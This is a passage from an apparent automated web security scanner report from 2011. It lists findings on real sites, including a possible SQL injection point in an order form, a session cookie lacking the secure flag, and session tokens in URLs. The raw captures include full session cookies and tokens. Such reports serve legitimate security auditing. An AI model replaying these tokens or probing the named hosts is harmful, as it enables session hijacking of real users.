Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:26 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 6237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title>
Newsgroups - Usenet Binaries Dot Com
</title>

<meta name="keywords" con
...[SNIP]...
<td id="trail">
       <form action="http://www.usenetbinaries.com/login" method="post" id="topsearch" align="left" display="inline">
       <FONT SIZE=1 COLOR=#333333>
...[SNIP]...
<input type="text" name="UB_USERNAME" size="20">
       password<input type="password" name="UB_PASSWORD" id="topquery" value="Password" size="20">
       </FONT>
...[SNIP]...

8. SQL statement in request parameter  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.open.com.au
Path:   /cgi-bin/sf.cgi

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

Request

POST /cgi-bin/sf.cgi HTTP/1.1
Host: www.open.com.au
Connection: keep-alive
Referer: https://www.open.com.au/onlineorder.php
Content-Length: 626
Cache-Control: max-age=0
Origin: https://www.open.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

formname=Online+order&config=onlineorder.cfg&currency=%2Fonlineorder.php%3Fcurrency%3DAUD&companyname=&address1=&address2=&city=&state=&postcode=&country=&contactname=&contactemail=&contactphone=&selectREmail=Select+from+the+drop+down+list+below&NosYearREmail=&ExtraRCombined=Select+from+the+drop+down+list+below&NosYearRCombined=&ExtraAA=Select+from+the+drop+down+list+below&NosYearAA=&invoice+to=&paymenttype=Credit+Card&cardtype=Select+Credit+Card+type&cardnumber=&cardname=&billing=&billing2=&expiry=&ccemail=&ppemail=&ppcurrency=PP-USD&ttemail=&
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:29 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 657

<html><head><title>Form Error</title></head>
<body><h1>Form Error</h1>
<strong>Your form was not successfully processed
because an error was encountered:</strong>
<p>Mandatory field 'accept' not pres
...[SNIP]...

9. SSL cookie without secure flag set  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.mailjet.com
Path:   /signup

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

POST /signup HTTP/1.1
Host: www.mailjet.com
Connection: keep-alive
Referer: http://www.mailjet.com/pricing
Content-Length: 10
Cache-Control: max-age=0
Origin: http://www.mailjet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=US-EN-smtp; mail_session=ue8DwvgMWj3limxfE4emkc%2Bezm%2B9mVnU%2FVoqCwNRZihPBS2aHbLPcJsh6zMrtsk5VBdWC2Q4%2FkY28R9i6SSa8dGAVUF8%2FPHumHv5F7VKYeMBcuJ3ocAQC8%2F1zpjTEa2eAIF2%2Fd1MaVsJjlYd%2BEvlsPy4Bruem8u21CL9yz8Ap%2Bo%2BCyjRIR52HCoEp7Gk2hMyvFZOK%2Fjx%2BGyh7%2Fsu8NFSZJ6LqVEMBAyL0NbwqKufi7iGB%2Fv%2F9tP9%2BJn57nRT7jf0OSu%2BSPaMMJ8CfmvGgjKuJr3Z3pjiI0Og8n2P%2BMDPxM5rZyhpW1H5bV6WiztfbkT5g%2BTxq5Sr9hjD093jyLRosfaux9DQuY9RcGBtBWydBnI%2FakIBZf1Gn%2FuhZ530ibuwBdDE3AAckB%2BX%2BQrsXYlox4bwiU%2BKUBCyOImviEfwVersfFPKJQTWs9BG6BLGawt5EAPShjQ3ZpGsRqD6D4DgBt8uEV0jSSUO5Nj9HsCmW6vnbM9Bc%2BhVI8FqYz2j4YkPtqWtgVhuS41Vo00JKJGreh2otpfEl3yl5R6F7KRY3%2BGclQqwvpHsWkNErB2NRzbFk4I3S%2FINHLVFnH2fvlkerYTMa%2B6iqgaqFGiaNLmKiqxdhh5hbqRCvPphR8CMT7hL; __utma=176514170.637056612.1316204845.1316216714.1316228159.3; __utmb=176514170.3.10.1316228159; __utmc=176514170; __utmz=176514170.1316228159.3.3.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server

plan_id=38

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:55:01 GMT
Server: MJWS/1.0
Set-Cookie: mail_session=iQluRDaaB5M5AYtNJtKxLETKPFlyZG2Bb7aOz31g0XcJh051qecDn7WucsCQ5sPWMgov3crx%2Fe%2FVKHsfCKjgl0ts693dBbaw%2Bn8Z%2FZBRorc9S8yidBGGXRaEhLryAJRKXu8%2BmD5MfSSdUTArbPeuXqQTjl2%2Bz9Sps1DERl3gEQpRfzJHQU4%2FwSwXV%2FxG%2F%2B%2FxrLfIRvU4YGR9sNKRhV7Tp8y6xVR%2F406%2FF0NJNO84XVNcH7wVgIoZ%2BDtc6ZqtqYfZNbZ%2Ffsn12Ti6F3wqJfDXrfqEvwXlxxkIL3LWxFPMBsj6GRMSN5Beq9y%2BPikxBZWSpq8SNFZCwRQuOf2iioO708BZnv4AmSVUO2TA2qNfgYDSH75LdyKerW%2BnqWtmWbNib2Ke0irqnRb2LZXI7vbN%2FqlLnObWTqNDuveaarqUwcND3a%2FSRhy9MB5hAXw5SRtmg69SfaKU5IXFco%2F3%2B7CnWJ%2F%2F7VWiEY9c4oqHIUD7f6HMgacyF5JKG%2BefqhRdjC8skgLWP1T%2F07KLzZIrP0dZRJgsTMBLpI%2FYkzvF6CxdxpufVXy5MYalpKk2AIm85yqTw1398l%2Fx3tDNeDOW8EJ4D6%2Fj86oVOWSL2aNXti%2FfnM7wXf2BD9wgdi6H8bNR5Xbf; expires=Fri, 23-Sep-2011 21:55:01 GMT; path=/; domain=.mailjet.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Sign up for a free - mailjet.
...[SNIP]...

10. Session token in URL  previous  next
There are 19 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


10.1. http://arc.help.yahoo.com/error.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://arc.help.yahoo.com
Path:   /error.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /error.gif?r=1316220874&token=YFFYBteDgDdLPZ0k7fwJ9Sg4yMzZSI6CcCTQxK0yIKxLB6KNA0PfvZxoLjY5xGdFVzk8hPRS3zyW6s3jOkSc0TcaSLxmTZN318xjtogAL.9VhmOuZmjm8edsiI3T8bMUjksF8KH0xLbXUjOT4IRm0NokBhjIw_BFM9LvZlHQ9Mux.tGSr_FTvDd7fjy4XyElSLcN1pSv4dXfEzfb4dS.IQenNUX8we8adPzBv2dXMDxRGBzr.g49VarUMhQ4VkiffBJAgZtZzvuvVGE9BI1uUT8opP4o71bSDWJvR5hecDkBkP_jBt.aYCOrlA4bTFUJN9Gl6KPGnhWrI8n37Izf3enUJEUs3ED1lZidDJ2dX2M2G_cJccwUi0EuVcHKMqJIfSZc8mN9a9rdr8T_j3j8NlG2E7tPJoVxG6XLLnZ0q_CW74w-&srv=omg.yahoo.com HTTP/1.1
Host: arc.help.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/search?p=xss&fr=ush_on_omg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:36 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Connection: close
Content-Type: image/gif
Cache-Control: private
Content-Length: 921

GIF89a*.)..5............4...yx_........Y.....LPJ(.....j..0.."..,.....).....K..............%..M.|.........C..)....Q..>.g..|6..5...........1........+........o..l..2..k..A...............................
...[SNIP]...

10.2. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://ibmwebsphere.tt.omtrdc.net
Path:   /m2/ibmwebsphere/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/ibmwebsphere/mbox/standard?mboxHost=www-142.ibm.com&mboxSession=1316221012167-554408&mboxPage=1316221012167-554408&screenHeight=1200&screenWidth=1920&browserWidth=1106&browserHeight=789&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=software_global_top&mboxId=0&mboxTime=1316203012179&mboxURL=http%3A%2F%2Fwww-142.ibm.com%2Fsoftware%2Fproducts%2Fus%2Fen%2Fsearch%3Fpgel%3Dlnav%26hppcode%3D1%26st%3Dnew%26q1%3Dxss&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: ibmwebsphere.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-142.ibm.com/software/products/us/en/search?pgel=lnav&hppcode=1&st=new&q1=xss

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1316221012167-554408.19; Domain=ibmwebsphere.tt.omtrdc.net; Expires=Fri, 30-Sep-2011 19:55:56 GMT; Path=/m2/ibmwebsphere
Content-Type: text/javascript
Content-Length: 1639
Date: Fri, 16 Sep 2011 19:55:55 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('software_global_top',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defa
...[SNIP]...

10.3. http://omg.yahoo.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234; tiles=15048; D=_ylt=AmIAFjkePx2C.hXo_3wFjasg6Bx.

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:56:06 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 4900

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<!-- AltLogo -->
<img src=http://arc.help.yahoo.com/error.gif?r=1316220966&token=16krEpWDgDdIRxjnLb_oF4J7IVRiBc2ROfGeArllOZhPGp1_BwTFL26RdEYlUOEsZsvE_SJDekzAebY2.QN2U0MOW0.x0flOm8amJaTEEMdLfGqyvz517FmD8smM9Nv4Hc2e2rsbDk4ChCoZpKDAIph2FrwU6M2ResnUkwr.f14VzBC4bMtp.IEI6FtnEALjsBvo4iA4JWwMGSOU1iYZUWV9km3jrTTgS3OGzEIgomMc8r3jxO0WBB.zj2rZjK21nCk4ES_.2RexyDlTMEYzi6WWuxxxFaouyw_Of8rPLRWVMtMo1bnbu.Kfi.pjmaanakECvsuilB8Eiu81bi002gTi6Upeoog-&srv=omg.yahoo.com alt="Yahoo!" width=42 height=41 border=0>
<!---------------->
...[SNIP]...
<!-- Temporary -->
While this error is usually temporary, if it continues and the above
solutions don't resolve your problem, please
<a href="http://arc.help.yahoo.com/arc/?token=16krEpWDgDdIRxjnLb_oF4J7IVRiBc2ROfGeArllOZhPGp1_BwTFL26RdEYlUOEsZsvE_SJDekzAebY2.QN2U0MOW0.x0flOm8amJaTEEMdLfGqyvz517FmD8smM9Nv4Hc2e2rsbDk4ChCoZpKDAIph2FrwU6M2ResnUkwr.f14VzBC4bMtp.IEI6FtnEALjsBvo4iA4JWwMGSOU1iYZUWV9km3jrTTgS3OGzEIgomMc8r3jxO0WBB.zj2rZjK21nCk4ES_.2RexyDlTMEYzi6WWuxxxFaouyw_Of8rPLRWVMtMo1bnbu.Kfi.pjmaanakECvsuilB8Eiu81bi002gTi6Upeoog-&.intl=us&srv=omg.yahoo.com">let us know</a>
...[SNIP]...

10.4. http://omg.yahoo.com/hot-topics  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /hot-topics

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /hot-topics HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1; tiles=15048|15034; aDxT=0.7728892085142434; D=_ylt=ApBUt9UwYWg4YgZo4dQbq_sPpxx.

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:58:09 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 4956

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<!-- AltLogo -->
<img src=http://arc.help.yahoo.com/error.gif?r=1316221089&token=IFCN4OSDgDdbEbcMcnRZcrF8tdc7moXNPM7o7k8rIKta3HhZKcdVGO1j8otsVnmIEFZqcBJED4WvK0sbCyeZgU2NC394PkbG6QbNEsjOkHCeMZKcgAOORcGP5xLJJQNl.JqMHYgNzYUQ8XgyRi5lcM4k7uqr1cQPK_FqWM0RIvIb71ikckK8ozzOlCin00TP.68WLqwQ2GfhpRHojZIxDFDApgvvrluVyl97phrBzoUXX7Y.qBBAvTrRFJiMk7ElD.rGtqJq9mqmC2dgiePhZig1oKBa04Z86FDFHENBSoqTmnrDh6j.Rty4ws.BSwNp9bDwU4ArdDyfLSfJ0nZrBhOCVF8W78t.Vu.g6VNsm2RgLTSWrBOqqPAq4A--&srv=omg.yahoo.com alt="Yahoo!" width=42 height=41 border=0>
<!---------------->
...[SNIP]...
<!-- Temporary -->
While this error is usually temporary, if it continues and the above
solutions don't resolve your problem, please
<a href="http://arc.help.yahoo.com/arc/?token=IFCN4OSDgDdbEbcMcnRZcrF8tdc7moXNPM7o7k8rIKta3HhZKcdVGO1j8otsVnmIEFZqcBJED4WvK0sbCyeZgU2NC394PkbG6QbNEsjOkHCeMZKcgAOORcGP5xLJJQNl.JqMHYgNzYUQ8XgyRi5lcM4k7uqr1cQPK_FqWM0RIvIb71ikckK8ozzOlCin00TP.68WLqwQ2GfhpRHojZIxDFDApgvvrluVyl97phrBzoUXX7Y.qBBAvTrRFJiMk7ElD.rGtqJq9mqmC2dgiePhZig1oKBa04Z86FDFHENBSoqTmnrDh6j.Rty4ws.BSwNp9bDwU4ArdDyfLSfJ0nZrBhOCVF8W78t.Vu.g6VNsm2RgLTSWrBOqqPAq4A--&.intl=us&srv=omg.yahoo.com">let us know</a>
...[SNIP]...

10.5. http://omg.yahoo.com/news/january-jones-welcomes-baby-boy-xander/72215  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /news/january-jones-welcomes-baby-boy-xander/72215

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /news/january-jones-welcomes-baby-boy-xander/72215 HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1; aDxT=0.6684604792390019; tiles=15048|15034

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:58:04 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 5165

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<!-- AltLogo -->
<img src=http://arc.help.yahoo.com/error.gif?r=1316221084&token=i5aJlUeDgDfJhWkhfSpqNFOMKcYHYkqQoI5q0AAKMwvsPHQpeX3wrnLFtnE080EEETaxOyCIqEJlU_1CA1aC9omJcw118JucVJGyHIimkP0cOysJSdd9OvIyt2hV_8t.BnsMyQtiTIz6rlCqSV3mzyR4wU4o4ANoWYlZIFEgQnxYf84R9Y0a.SRQ4PJfgHowTrIb2e03V91QIr_K9deA8GtC6pLMSIQ5g1R_3xzJ5syfsYQ4.6QYSu6ErYMwtYsYGhTjoeWtsVG968ctGo4KNUKASrofZk5i3TpmJx.MpWsPeQgMb9L3jraPoEp.ldqRYU99NBea28Vb84gucv0k5t7xZ0RUZnva5GgWybochMWQJ1w2h02SHIaheLDDy9VbSclBwblH3vfQKgUPj56vcFBqxEd8XuGV3Q7vzd1yQbTE8suu26G9DHZtFtFyYLwRk6UHo8thEW5xpkUlqFFbtEUBMZIrbpUMrw--&srv=omg.yahoo.com alt="Yahoo!" width=42 height=41 border=0>
<!---------------->
...[SNIP]...
<!-- Temporary -->
While this error is usually temporary, if it continues and the above
solutions don't resolve your problem, please
<a href="http://arc.help.yahoo.com/arc/?token=i5aJlUeDgDfJhWkhfSpqNFOMKcYHYkqQoI5q0AAKMwvsPHQpeX3wrnLFtnE080EEETaxOyCIqEJlU_1CA1aC9omJcw118JucVJGyHIimkP0cOysJSdd9OvIyt2hV_8t.BnsMyQtiTIz6rlCqSV3mzyR4wU4o4ANoWYlZIFEgQnxYf84R9Y0a.SRQ4PJfgHowTrIb2e03V91QIr_K9deA8GtC6pLMSIQ5g1R_3xzJ5syfsYQ4.6QYSu6ErYMwtYsYGhTjoeWtsVG968ctGo4KNUKASrofZk5i3TpmJx.MpWsPeQgMb9L3jraPoEp.ldqRYU99NBea28Vb84gucv0k5t7xZ0RUZnva5GgWybochMWQJ1w2h02SHIaheLDDy9VbSclBwblH3vfQKgUPj56vcFBqxEd8XuGV3Q7vzd1yQbTE8suu26G9DHZtFtFyYLwRk6UHo8thEW5xpkUlqFFbtEUBMZIrbpUMrw--&.intl=us&srv=omg.yahoo.com">let us know</a>
...[SNIP]...

10.6. http://omg.yahoo.com/photos/what-were-they-thinking/5203  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /photos/what-were-they-thinking/5203

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /photos/what-were-they-thinking/5203 HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234; tiles=15048

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:58 GMT
Set-Cookie: D=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/; domain=.yahoo.com
Set-Cookie: B=8942vl5777rt6&b=3&s=hu; expires=Tue, 16-Sep-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 135006

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head profile="http://purl.org/NET/erdf/profile">

   <link rel="schema.celeb" href="http://omg.yahoo.co
...[SNIP]...
<noscript>
                           <iframe src="/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab" width="300" height="270" frameborder="0" border="0" marginheight="0" marginwidth="0" scrolling="No"></iframe>
...[SNIP]...

10.7. http://omg.yahoo.com/search  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /search

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /search?p=xss&fr=ush_on_omg HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; tiles=15048; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1; aDxT=0.10422400059178472

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:57:20 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 5061

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<!-- AltLogo -->
<img src=http://arc.help.yahoo.com/error.gif?r=1316221040&token=dkVHraSDgDcT.G32D48nJL_x2Qv5ZnhcMjejUh6Xkt2O93_Sl6MowdGU3xGuRnfZbceuu4D6kiVO3QgfjwvdftcvwJNsbwp.yRgOTbNbINTmgcoiH1XeFHUfGfMx4aT3w9HJNmThUMqsul69P21vG_WM6G4N9XkMhPNpGUuri_VGEBy6wtwMLEfA_jw4lW5b7h_9_nP.kxaBA.PyVrLcc2HHJzD38xgZvKAbSOhYvNXSZnNMfqDdps0ZwlHtFJemFr7Iy76Q4JJI8Ba6Askn.1bywAfmXUcA76wTKXbbiY5NSAWXOz339BDtOjqCjHGqKu3MewdB2YFtw_KRyjKki.SGbSpfMTd9L.VzmtenkqF_6ioFdyXg6ChZeOYt4jOLCD1XSwgnPuL9f08NuCDwl1h_xUmhk.gEV_Pyk3hleqZzpeM-&srv=omg.yahoo.com alt="Yahoo!" width=42 height=41 border=0>
<!---------------->
...[SNIP]...
<!-- Temporary -->
While this error is usually temporary, if it continues and the above
solutions don't resolve your problem, please
<a href="http://arc.help.yahoo.com/arc/?token=dkVHraSDgDcT.G32D48nJL_x2Qv5ZnhcMjejUh6Xkt2O93_Sl6MowdGU3xGuRnfZbceuu4D6kiVO3QgfjwvdftcvwJNsbwp.yRgOTbNbINTmgcoiH1XeFHUfGfMx4aT3w9HJNmThUMqsul69P21vG_WM6G4N9XkMhPNpGUuri_VGEBy6wtwMLEfA_jw4lW5b7h_9_nP.kxaBA.PyVrLcc2HHJzD38xgZvKAbSOhYvNXSZnNMfqDdps0ZwlHtFJemFr7Iy76Q4JJI8Ba6Askn.1bywAfmXUcA76wTKXbbiY5NSAWXOz339BDtOjqCjHGqKu3MewdB2YFtw_KRyjKki.SGbSpfMTd9L.VzmtenkqF_6ioFdyXg6ChZeOYt4jOLCD1XSwgnPuL9f08NuCDwl1h_xUmhk.gEV_Pyk3hleqZzpeM-&.intl=us&srv=omg.yahoo.com">let us know</a>
...[SNIP]...

